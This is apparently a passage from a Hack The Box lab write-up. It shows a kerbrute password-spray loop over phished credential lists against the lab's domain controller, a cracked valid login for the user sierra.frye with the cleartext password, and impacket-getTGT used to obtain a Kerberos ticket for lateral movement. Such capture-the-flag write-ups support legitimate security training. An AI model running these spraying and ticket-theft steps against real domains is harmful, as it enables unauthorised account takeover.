sierra.frye
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ for passwd in $(cat phished_passwds.txt); do kerbrute passwordspray --dc research.search.htb -d SEARCH.HTB ./phished_users.txt $passwd -t 40; done
[...REDACTED...]
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 01/30/24 - Ronnie Flathers @ropnop
2024/01/30 20:51:13 > Using KDC(s):
2024/01/30 20:51:13 > research.search.htb:88
2024/01/30 20:51:13 > [+] VALID LOGIN: Sierra.Frye@SEARCH.HTB:$$49=wide=STRAIGHT=jordan=28$$18
2024/01/30 20:51:13 > Done! Tested 14 logins (1 successes) in 0.120 seconds
[...REDACTED...]upon testing out those uncovered cleartext credentials, a valid domain credential is found; sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18
The user hasn’t changed the password since the incident
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ impacket-getTGT SEARCH.HTB/sierra.frye@research.search.htb -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: $$49=wide=STRAIGHT=jordan=28$$18
[*] Saving ticket in sierra.frye@research.search.htb.ccacheValidated and TGT generated
Lateral Movement made to the sierra.frye user